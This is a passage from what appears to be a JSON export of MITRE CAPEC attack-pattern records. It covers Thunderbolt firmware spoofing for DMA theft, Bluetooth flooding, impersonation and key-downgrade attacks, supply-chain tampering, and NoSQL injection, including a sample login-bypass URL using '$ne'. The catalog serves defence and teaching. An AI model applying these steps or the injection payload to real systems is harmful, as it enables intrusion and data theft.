adversary thunderbolt firmware image is written to attacker SPI flash."},{"Step":"1","Phase":"Exploit","Description":"[Connect adversary-controlled thunderbolt enabled device to victim device and verify successful execution of malicious actions] The adversary needs to determine if their exploitation of selected vulnerabilities had the intended effects upon victim device.","Technique":["Observe victim device identify adversary device as the victim device and enables PCIe tunneling.","Resume victim device from sleep, connect adversary-controlled device and observe security is disabled and Thunderbolt connectivity is restored with PCIe tunneling being enabled.","Observe that in UEFI or Thunderbolt Management Tool/UI that the Security Level does not match adversary modified Security Level of \\"None\\" (SL0)","Observe after installation of Firmware update that within Thunderbolt Management UI the \\"NVM version\\" is unchanged/same prior to the prompt of successful Firmware update/installation."]},{"Step":"2","Phase":"Exploit","Description":"[Exfiltration of desired data from victim device to adversary device] Utilize PCIe tunneling to transfer desired data and information from victim device across Thunderbolt connection."}]},"Prerequisites":{"Prerequisite":"The adversary needs at least a few minutes of physical access to a system with an open Thunderbolt port, version 3 or lower, and an external thunderbolt device controlled by the adversary with maliciously crafted software and firmware, via an SPI Programming device, to exploit weaknesses in security protections."},"Skills_Required":{"Skill":["Detailed knowledge on various system motherboards, PCI Express Domain, SPI, and Thunderbolt Protocol in order to interface with internal system components via external devices.",{"Level":"High"},"Detailed knowledge on OS/Kernel memory address space, Direct Memory Access (DMA) mapping, Input-Output Memory Management Units (IOMMUs), and vendor memory protections for data leakage.",{"Level":"High"},"Detailed knowledge on scripting and SPI programming in order to configure and modify Thunderbolt controller firmware and software configurations.",{"Level":"High"}]},"Resources_Required":{"Resource":["SPI Programming device capable of modifying/configuring or replacing the firmware of Thunderbolt device stored on SPI Flash of target Thunderbolt controller, as well as modification/spoofing of adversary-controlled Thunderbolt controller.","Precrafted scripts/tools capable of implementing the modification and replacement of Thunderbolt Firmware.","Thunderbolt-enabled computing device capable of interfacing with target Thunderbolt device and extracting/dumping data and memory contents of target device."]},"Indicators":{"Indicator":"Windows Event logs may document the access of Thunderbolt port as a USB 3.0 event as well as any malicious actions taken upon target device as file system and memory events."},"Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}]},"Mitigations":{"Mitigation":["Implementation: Kernel Direct Memory Access Protection","Configuration: Enable UEFI option USB Passthrough mode - Thunderbolt 3 system port operates as USB 3.1 Type C interface","Configuration: Enable UEFI option DisplayPort mode - Thunderbolt 3 system port operates as video-only DP interface","Configuration: Enable UEFI option Mixed USB/DisplayPort mode - Thunderbolt 3 system port operates as USB 3.1 Type C interface with support for DP mode","Configuration: Set Security Level to SL3 for Thunderbolt 2 system port","Configuration: Disable PCIe tunneling to set Security Level to SL3","Configuration: Disable Boot Camp upon MacOS systems"]},"Example_Instances":{"Example":{"p":"An adversary steals a password protected laptop that contains a Thunderbolt 3 enabled port, from a work environment. The adversary uses a screw driver to remove the back panel of the laptop and connects a SPI Programming device to the Thunderbolt Host Controller SPI Flash of the stolen victim device to interface with it on the adversary\'s own Thunderbolt enabled device via Thunderbolt cables. The SPI Programming device is utilized to execute scripts/tools from the adversary\'s own system to copy, parse, and modify the victim\'s Thunderbolt firmware stored on SPI Flash. The device UUID value is obtained, by computing the appropriate offset based upon Thunderbolt firmware version and the OS of victim device, from the DROM section of victim Thunderbolt host controller firmware image. The firmware image is written to adversary Thunderbolt host controller SPI flash to clone and spoof victim device identity. The adversary reboots the victim device, with the victim device identifying the Thunderbolt connection of the adversary\'s Thunderbolt device as itself and enables PCIe tunneling. The adversary finally transfers the hard drive and memory contents of victim device across Thunderbolt connection."}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"345"},{"CWE_ID":"353"},{"CWE_ID":"288"},{"CWE_ID":"1188"},{"CWE_ID":"862"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"T1495","Entry_Name":"Firmware Corruption"},{"Taxonomy_Name":"ATTACK","Entry_ID":"T1211","Entry_Name":"Exploitation for Defensive Evasion"},{"Taxonomy_Name":"ATTACK","Entry_ID":"T1556","Entry_Name":"Modify Authentication Process"}]},"References":{"Reference":[{"External_Reference_ID":"REF-647"},{"External_Reference_ID":"REF-648"},{"External_Reference_ID":"REF-649"},{"External_Reference_ID":"REF-650"},{"External_Reference_ID":"REF-651"},{"External_Reference_ID":"REF-652"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"666":{"ID":"666","Name":"BlueSmacking","Abstraction":"Standard","Status":"Draft","Description":"An adversary uses Bluetooth flooding to transfer large packets to Bluetooth enabled devices over the L2CAP protocol with the goal of creating a DoS. This attack must be carried out within close proximity to a Bluetooth enabled device.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"125"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Scan for Bluetooth Enabled Devices] Using BlueZ along with an antenna, an adversary searches for devices with Bluetooth on.","Technique":"Note the MAC address of the device you want to attack."},{"Step":"2","Phase":"Experiment","Description":"[Change L2CAP Packet Length] The adversary must change the L2CAP packet length to create packets that will overwhelm a Bluetooth enabled device.","Technique":"An adversary downloads and installs BlueZ, the standard Bluetooth utility package for Linux."},{"Step":"3","Phase":"Exploit","Description":"[Flood] An adversary sends the packets to the target device, and floods it until performance is degraded."}]},"Prerequisites":{"Prerequisite":"The system/application has Bluetooth enabled."},"Skills_Required":{"Skill":["An adversary only needs a Linux machine along with a Bluetooth adapter, which is extremely common.",{"Level":"Low"}]},"Indicators":{"Indicator":"Performance is degraded or halted by incoming L2CAP packets."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":["Unreliable Execution","Resource Consumption"]}},"Mitigations":{"Mitigation":["Disable Bluetooth when not being used.","When using Bluetooth, set it to hidden or non-discoverable mode."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"404"}},"References":{"Reference":{"External_Reference_ID":"REF-655"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"667":{"ID":"667","Name":"Bluetooth Impersonation AttackS (BIAS)","Abstraction":"Detailed","Status":"Draft","Description":"An adversary disguises the MAC address of their Bluetooth enabled device to one for which there exists an active and trusted connection and authenticates successfully. The adversary can then perform malicious actions on the target Bluetooth device depending on the target\u2019s capabilities.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"616","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"513"},{"Exclude_ID":"515"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find disguise and target] The adversary starts the Bluetooth service on the attacking device and searches for nearby listening devices.","Technique":["Knowledge of a trusted MAC address.","Scanning for devices other than the target that may be trusted."]},{"Step":"2","Phase":"Experiment","Description":"[Disguise] Using the MAC address of the device the adversary wants to impersonate, they may use a tool such as spooftooth or macchanger to spoof their Bluetooth address and attempt to authenticate with the target."},{"Step":"3","Phase":"Exploit","Description":"[Use device capabilities to accomplish goal] Finally, if authenticated successfully the adversary can perform tasks/information gathering dependent on the target\'s capabilities and connections."}]},"Prerequisites":{"Prerequisite":"Knowledge of a target device\'s list of trusted connections."},"Skills_Required":{"Skill":["Adversaries must be capable of using command line Linux tools.",{"Level":"Low"},"Adversaries must be in close proximity to Bluetooth devices.",{"Level":"Low"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Note":"An adversary will be impersonating another Bluetooth device, and may gain access to information pertaining to that user along with the ability to manipulate other information."},{"Scope":"Confidentiality","Note":"An adversary will have unauthorized access to information."}]},"Mitigations":{"Mitigation":["Disable Bluetooth in public places.","Verify incoming Bluetooth connections; do not automatically trust.","Change default PIN passwords and always use one when connecting."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"290"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"668":{"ID":"668","Name":"Key Negotiation of Bluetooth Attack (KNOB)","Abstraction":"Standard","Status":"Draft","Description":"An adversary can exploit a flaw in Bluetooth key negotiation allowing them to decrypt information sent between two devices communicating via Bluetooth. The adversary uses an Adversary in the Middle setup to modify packets sent between the two devices during the authentication process, specifically the entropy bits. Knowledge of the number of entropy bits will allow the attacker to easily decrypt information passing over the line of communication.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"115"},{"Nature":"CanPrecede","CAPEC_ID":"148"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Discovery] Using an established Person in the Middle setup, search for Bluetooth devices beginning the authentication process.","Technique":"Use packet capture tools."},{"Step":"2","Phase":"Experiment","Description":"[Change the entropy bits] Upon recieving the initial key negotiation packet from the master, the adversary modifies the entropy bits requested to 1 to allow for easy decryption before it is forwarded."},{"Step":"3","Phase":"Exploit","Description":"[Capture and decrypt data] Once the entropy of encryption is known, the adversary can capture data and then decrypt on their device."}]},"Prerequisites":{"Prerequisite":"Person in the Middle network setup."},"Skills_Required":{"Skill":["Ability to modify packets.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Bluetooth adapter, packet capturing capabilities."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":"Newer Bluetooth firmwares ensure that the KNOB is not negotaited in plaintext. Update your device."},"Example_Instances":{"Example":"Given users Alice, Bob and Charlie (Charlie being the attacker), Alice and Bob begin to agree on an encryption key when connecting. While Alice sends a message to Bob that an encryption key with 16 bytes of entropy should be used, Charlie changes this to 1 and forwards the request to Bob and continues forwarding these packets until authentication is successful."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"425"},{"CWE_ID":"285"},{"CWE_ID":"693"}]},"References":{"Reference":{"External_Reference_ID":"REF-657"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"669":{"ID":"669","Name":"Alteration of a Software Update","Abstraction":"Standard","Status":"Draft","Description":{"p":"An adversary with access to an organization\u2019s software update infrastructure inserts malware into the content of an outgoing update to fielded systems where a wide range of malicious effects are possible. With the same level of access, the adversary can alter a software update to perform specific malicious acts including granting the adversary control over the software\u2019s normal functionality."},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"184"},{"Nature":"CanPrecede","CAPEC_ID":"673"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify software with frequent updates] The adversary must first identify a target software that has updates at least with some frequency, enough that there is am update infrastructure."},{"Step":"2","Phase":"Experiment","Description":"[Gain access to udpate infrastructure] The adversary must then gain access to the organization\'s software update infrastructure. This can either be done by gaining remote access from outside the organization, or by having a malicious actor inside the organization gain access. It is often easier if someone within the organization gains access."},{"Step":"3","Phase":"Exploit","Description":"[Alter the software update] Through access to the software update infrastructure, an adversary will alter the software update by injecting malware into the content of an outgoing update."}]},"Prerequisites":{"Prerequisite":"An adversary would need to have penetrated an organization\u2019s software update infrastructure including gaining access to components supporting the configuration management of software versions and updates related to the software maintenance of customer systems."},"Skills_Required":{"Skill":["Skills required include the ability to infiltrate the organization\u2019s software update infrastructure either from the Internet or from within the organization, including subcontractors, and be able to change software being delivered to customer/user systems in an undetected manner.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Have a Software Assurance Plan that includes maintaining strict configuration management control of source code, object code and software development, build and distribution tools; manual code reviews and static code analysis for developmental software; and tracking of all storage and movement of code.","Require elevated privileges for distribution of software and software updates."]},"Example_Instances":{"Example":{"p":"A subcontractor to a software developer injects maliciously altered software updates into an automated update process that distributes to government and commercial customers software containing a hidden backdoor."}},"References":{"Reference":[{"External_Reference_ID":"REF-658"},{"External_Reference_ID":"REF-659"},{"External_Reference_ID":"REF-660"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}}},"670":{"ID":"670","Name":"Software Development Tools Maliciously Altered","Abstraction":"Detailed","Status":"Draft","Description":"An adversary with the ability to alter tools used in a development environment causes software to be developed with maliciously modified tools. Such tools include requirements management and database tools, software design tools, configuration management tools, compilers, system build tools, and software performance testing and load testing tools. The adversary then carries out malicious acts once the software is deployed including malware infection of other systems to support further compromises.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"CanPrecede","CAPEC_ID":"669"}]},"Prerequisites":{"Prerequisite":"An adversary would need to have access to a targeted developer\u2019s development environment and in particular to tools used to design, create, test and manage software, where the adversary could ensure malicious code is included in software packages built through alteration or substitution of tools in the environment used in the development of software."},"Skills_Required":{"Skill":["Ability to leverage common delivery mechanisms (e.g., email attachments, removable media) to infiltrate a development environment to gain access to software development tools for the purpose of malware insertion into an existing tool or replacement of an existing tool with a maliciously altered copy.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Execute Unauthorized Commands"},{"Scope":"Access Control","Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":["Modify Data","Read Data"]}]},"Mitigations":{"Mitigation":["Have a security concept of operations (CONOPS) for the development environment that includes: Maintaining strict security administration and configuration management of requirements management and database tools, software design tools, configuration management tools, compilers, system build tools, and software performance testing and load testing tools.","Avoid giving elevated privileges to developers."]},"Example_Instances":{"Example":"An adversary with access to software build tools inside an Integrated Development Environment IDE alters a script used for downloading dependencies from a dependent code repository where the script has been changed to include malicious code implanted in the repository by the adversary."},"References":{"Reference":[{"External_Reference_ID":"REF-660"},{"External_Reference_ID":"REF-661"},{"External_Reference_ID":"REF-667"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"671":{"ID":"671","Name":"Requirements for ASIC Functionality Maliciously Altered","Abstraction":"Detailed","Status":"Draft","Description":"An adversary with access to functional requirements for an application specific integrated circuit (ASIC), a chip designed/customized for a singular particular use, maliciously alters requirements derived from originating capability needs. In the chip manufacturing process, requirements drive the chip design which, when the chip is fully manufactured, could result in an ASIC which may not meet the user\u2019s needs, contain malicious functionality, or exhibit other anomalous behaviors thereby affecting the intended use of the ASIC.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"447"}},"Prerequisites":{"Prerequisite":"An adversary would need to have access to a foundry\u2019s or chip maker\u2019s requirements management system that stores customer requirements for ASICs, requirements upon which the design of the ASIC is based."},"Skills_Required":{"Skill":["An adversary would need experience in designing chips based on functional requirements in order to manipulate requirements in such a way that deviations would not be detected in subsequent stages of ASIC manufacture and where intended malicious functionality would be available to the adversary once integrated into a system and fielded.",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Alter Execution Logic"}},"Mitigations":{"Mitigation":["Utilize DMEA\u2019s (Defense Microelectronics Activity) Trusted Foundry Program members for acquisition of microelectronic components.","Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management including for hardware requirements and design.","Require that provenance of COTS microelectronic components be known whenever procured.","Conduct detailed vendor assessment before acquiring COTS hardware."]},"Example_Instances":{"Example":"An adversary with access to ASIC functionality requirements for various customers, targets a particular customer\u2019s ordered lot of ASICs by altering its functional requirements such that the ASIC design will result in a manufactured chip that does not meet the customer\u2019s capability needs."},"References":{"Reference":{"External_Reference_ID":"REF-661"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"672":{"ID":"672","Name":"Malicious Code Implanted During Chip Programming","Abstraction":"Detailed","Status":"Draft","Description":{"p":"During the programming step of chip manufacture, an adversary with access and necessary technical skills maliciously alters a chip\u2019s intended program logic to produce an effect intended by the adversary when the fully manufactured chip is deployed and in operational use. Intended effects can include the ability of the adversary to remotely control a host system to carry out malicious acts."},"Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444"}},"Prerequisites":{"Prerequisite":"An adversary would need to have access to a foundry\u2019s or chip maker\u2019s development/production environment where programs for specific chips are developed, managed and uploaded into targeted chips prior to distribution or sale."},"Skills_Required":{"Skill":["An adversary needs to be skilled in microprogramming, manipulation of configuration management systems, and in the operation of tools used for the uploading of programs into chips during manufacture. Uploading can be for individual chips or performed on a large scale basis.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Alter Execution Logic"}},"Mitigations":{"Mitigation":["Utilize DMEA\u2019s (Defense Microelectronics Activity) Trusted Foundry Program members for acquisition of microelectronic components.","Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management of microcode and microcode generating tools and software.","Require that provenance of COTS microelectronic components be known whenever procured.","Conduct detailed vendor assessment before acquiring COTS hardware."]},"Example_Instances":{"Example":{"p":"Following a chip\u2019s production process steps of test and verification and validation of chip circuitry, an adversary involved in the generation of microcode defining the chip\u2019s function(s) inserts a malicious instruction that will become part of the chip\u2019s program. When integrated into a system, the chip will produce an effect intended by the adversary."}},"References":{"Reference":{"External_Reference_ID":"REF-662"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"673":{"ID":"673","Name":"Developer Signing Maliciously Altered Software","Abstraction":"Detailed","Status":"Draft","Description":{"p":["Software produced by a reputable developer is clandestinely infected with malicious code and then digitally signed by the unsuspecting developer, where the software has been altered via a compromised software development or build process prior to being signed. The receiver or user of the software has no reason to believe that it is anything but legitimate and proceeds to deploy it to organizational systems.","This attack differs from CAPEC-206, since the developer is inadvertently signing malicious code they believe to be legitimate and which they are unware of any malicious modifications."]},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"An adversary would need to have access to a targeted developer\u2019s software development environment, including to their software build processes, where the adversary could ensure code maliciously tainted prior to a build process is included in software packages built."},"Skills_Required":{"Skill":["The adversary must have the skills to infiltrate a developer\u2019s software development/build environment and to implant malicious code in developmental software code, a build server, or a software repository containing dependency code, which would be referenced to be included during the software build process.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality"],"Impact":["Read Data","Modify Data"]},{"Scope":["Access Control","Authorization"],"Impact":["Gain Privileges","Execute Unauthorized Commands"]}]},"Mitigations":{"Mitigation":["Have a security concept of operations (CONOPS) for the IDE that includes: Protecting the IDE via logical isolation using firewall and DMZ technologies/architectures; Maintaining strict security administration and configuration management of configuration management tools, developmental software and dependency code repositories, compilers, and system build tools.","Employ intrusion detection and malware detection capabilities on IDE systems where feasible."]},"Example_Instances":{"Example":{"p":"An adversary who has infiltrated an organization\u2019s build environment maliciously alters code intended to be included in a product\u2019s software build via software dependency inclusion, part of the software build process. When the software product has been built, the developer electronically signs the finished product using their signing key. The recipient of the software product, an end user/customer, believes the software to reflect the developer\u2019s intent with respect to functionality unaware of the adversary\u2019s malicious intent harbored within."}},"References":{"Reference":[{"External_Reference_ID":"REF-658"},{"External_Reference_ID":"REF-659"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"674":{"ID":"674","Name":"Design for FPGA Maliciously Altered","Abstraction":"Detailed","Status":"Stable","Description":{"p":"An adversary alters the functionality of a field-programmable gate array (FPGA) by causing an FPGA configuration memory chip reload in order to introduce a malicious function that could result in the FPGA performing or enabling malicious functions on a host system. Prior to the memory chip reload, the adversary alters the program for the FPGA by adding a function to impact system operation."},"Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"447"}},"Prerequisites":{"Prerequisite":"An adversary would need to have access to FPGA programming/configuration-related systems in a chip maker\u2019s development environment where FPGAs can be initially configured prior to delivery to a customer or have access to such systems in a customer facility where end-user FPGA configuration/reconfiguration can be performed."},"Skills_Required":{"Skill":["An adversary would need to be skilled in FPGA programming in order to create/manipulate configurations in such a way that when loaded into an FPGA, the end user would be able to observe through testing all user-defined required functions but would be unaware of any additional functions the adversary may have introduced.",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Alter Execution Logic"}},"Mitigations":{"Mitigation":["Utilize DMEA\u2019s (Defense Microelectronics Activity) Trusted Foundry Program members for acquisition of microelectronic components.","Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management including for FPGA programming and program uploads to FPGA chips.","Require that provenance of COTS microelectronic components be known whenever procured.","Conduct detailed vendor assessment before acquiring COTS hardware."]},"Example_Instances":{"Example":{"p":"An adversary with access and the ability to alter the configuration/programming of FPGAs in organizational systems, introduces a trojan backdoor that can be used to alter the behavior of the original system resulting in, for example, compromise of confidentiality of data being processed."}},"References":{"Reference":[{"External_Reference_ID":"REF-660"},{"External_Reference_ID":"REF-661"},{"External_Reference_ID":"REF-662"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"675":{"ID":"675","Name":"Retrieve Data from Decommissioned Devices","Abstraction":"Standard","Status":"Stable","Description":{"p":"An adversary obtains decommissioned, recycled, or discarded systems and devices that can include an organization\u2019s intellectual property, employee data, and other types of controlled information. Systems and devices that have reached the end of their lifecycles may be subject to recycle or disposal where they can be exposed to adversarial attempts to retrieve information from internal memory chips and storage devices that are part of the system."},"Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"116"},{"Nature":"CanPrecede","CAPEC_ID":"37"}]},"Prerequisites":{"Prerequisite":"An adversary needs to have access to electronic data processing equipment being recycled or disposed of (e.g., laptops, servers) at a collection location and the ability to take control of it for the purpose of exploiting its content."},"Skills_Required":{"Skill":["An adversary may need the ability to mount printed circuit boards and target individual chips for exploitation.",{"Level":"High"},"An adversary needs the technical skills required to extract solid state drives, hard disk drives, and other storage media to host on a compatible system or harness to gain access to digital content.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Accountability","Impact":"Bypass Protection Mechanism"}},"Example_Instances":{"Example":{"p":"A company is contracted by an organization to provide data destruction services for solid state and hard disk drives being discarded. Prior to destruction, an adversary within the contracted company copies data from select devices, violating the data confidentiality requirements of the submitting organization."}},"References":{"Reference":{"External_Reference_ID":"REF-663"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"676":{"ID":"676","Name":"NoSQL Injection","Abstraction":"Standard","Status":"Stable","Description":{"p":"An adversary targets software that constructs NoSQL statements based on user input or with parameters vulnerable to operator replacement in order to achieve a variety of technical impacts such as escalating privileges, bypassing authentication, and/or executing code."},"Extended_Description":{"p":["NoSQL database calls are written in an application\'s programming language, via a custom API call, or formatted in a common convention (e.g., JSON, XML, etc.), any of which the adversary can exploit to achieve the aforementioned goals. NoSQL attacks usually result from improper sanitization and validation of data that originates from a user, either via special character or JavaScript injection. In both cases, the adversary crafts input strings so that when the target software constructs NoSQL statements based on the input, the resulting NoSQL statement performs actions other than those intended by the application. However, unlike traditional SQL Injection attacks, NoSQL injection attacks can also occur in instances where the application does not rely upon user input, as is the case in operator replacements. This entails the adversary overriding reserved NoSQL variable names with ones that have been modified with malicious functionality (e.g., $where in MongoDB). In all cases, depending on the NoSQL API and data model used, successful injection can cause information disclosure, data modification, and code execution at the application level.","Note: NoSQL Injection attacks are executed within a procedural language (e.g., C, C++, Perl), as opposed to the declarative SQL language itself. As a result, NoSQL injection attacks can potentially result in greater impacts than traditional SQL Injection attacks [REF-668]."]},"Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"248"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey target application] Due to the number of NoSQL databases available and the numerous language/API combinations of each, the adversary must first survey the target application to learn what technologies are being leveraged and how they interact with user-driven data.","Technique":["Determine the technology stack leveraged by the target application, such as the application server, drivers, frameworks, APIs, and databases being utilized.","Identify areas of the application that interact with user input and may be involved with NoSQL queries."]},{"Step":"2","Phase":"Experiment","Description":"[Identify user-controllable input susceptible to injection] After identifying the technology stack being used and where user-driven input is leveraged, determine the user-controllable input susceptible to injection such as authentication or search forms. For each user-controllable input that the adversary suspects is vulnerable to NoSQL injection, attempt to inject characters or keywords that have special meaning in the given NoSQL database or language (e.g., \\"$ne\\" for MongoDB or \\"$exists\\" for PHP/MongoDB), or JavaScript that can be executed within the application. The goal is to create a NoSQL query with an invalid syntax.","Technique":["Use web browser to inject input through text fields or through HTTP GET parameters.","Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.","Use network-level packet injection tools such as netcat to inject input","Use modified client (modified by reverse engineering) to inject input."]},{"Step":"3","Phase":"Experiment","Description":"[Experiment with NoSQL Injection vulnerabilities] After determining that a given input is vulnerable to NoSQL Injection, hypothesize what the underlying query looks like. Iteratively try to add logic to the query to extract information from the database, modify/delete information in the database, or execute commands on the server.","Technique":["Use public resources such as OWASP\'s \\"Testing for NoSQL Injection\\" [REF-668] or Null Sweep\'s \\"NoSQL Injection Cheatsheet\\" [REF-669] and try different approaches for adding logic to NoSQL queries.","Iteratively add logic to the NoSQL query and use detailed error messages from the server to debug the query.","Attempt an HTTP Parameter Pollution attack to replace language-specific keywords, such as \\"where\\" within PHP [CAPEC-460]."]},{"Step":"4","Phase":"Exploit","Description":"[Exploit NoSQL Injection vulnerability] After refining and adding various logic to NoSQL queries, craft and execute the underlying NoSQL query that will be used to attack the target system.","Technique":"Craft and Execute underlying NoSQL query"}]},"Prerequisites":{"Prerequisite":["Awareness of the technology stack being leveraged by the target application.","NoSQL queries used by the application to store, retrieve, or modify data.","User-controllable input that is not properly validated by the application as part of NoSQL queries.","Target potentially susceptible to operator replacement attacks."]},"Skills_Required":{"Skill":["For keyword and JavaScript injection attacks, it is fairly simple for someone with basic NoSQL knowledge to perform NoSQL injection, once the target\'s technology stack has been determined.",{"Level":"Low"},"For operator replacement attacks, the adversary must also have knowledge of HTTP Parameter Pollution attacks and how to conduct them.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Indicators":{"Indicator":["Too many false or invalid queries to the database, especially those caused by malformed input.","Executed queries or commands that appear to malicious in nature or originating from an untrustworthy source."]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as relevant NoSQL and JavaScript content. NoSQL-specific keywords, such as $ne, $eq or $gt for MongoDB, must be filtered in addition to characters such as a single-quote(\') or semicolons (;) based on the context in which they appear. Validation should also extend to expected types.","If possible, leverage safe APIs (e.g., PyMongo and Flask-PyMongo for Python and MongoDB) for queries as opposed to building queries from strings.","Ensure the most recent version of a NoSQL database and it\'s corresponding API are used by the application.","Use of custom error pages - Adversaries can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application.","Exercise the principle of Least Privilege with regards to application accounts to minimize damage if a NoSQL injection attack is successful.","If using MongoDB, disable server-side JavaScript execution and leverage a sanitization module such as \\"mongo-sanitize\\".","If using PHP with MongoDB, ensure all special query operators (starting with $) use single quotes to prevent operator replacement attacks.","Additional mitigations will depend on the NoSQL database, API, and programming language leveraged by the application."]},"Example_Instances":{"Example":[{"p":["The following examples primarily cite MongoDB, PHP, and NodeJS attacks due to their prominence and popularity. However, please note that these attacks are not exclusive to this NoSQL instance, programming language, or runtime framework.","Within NodeJS, Login Bypass attacks are possible via MongoDB if user-input is not properly validated and sanitized [REF-670].","The above code works fine if the user were to submit a query like the following:","https://example.org/login?user=patrick&password=1234","But an adversary could submit a malicious query such as the below, which would be interpreted by the code as follows:","https://example.org/login?user=patrick&password[$ne]=","This will result in a Login Bypass attack, as the query will succeed for all values where Bob\'s password is not 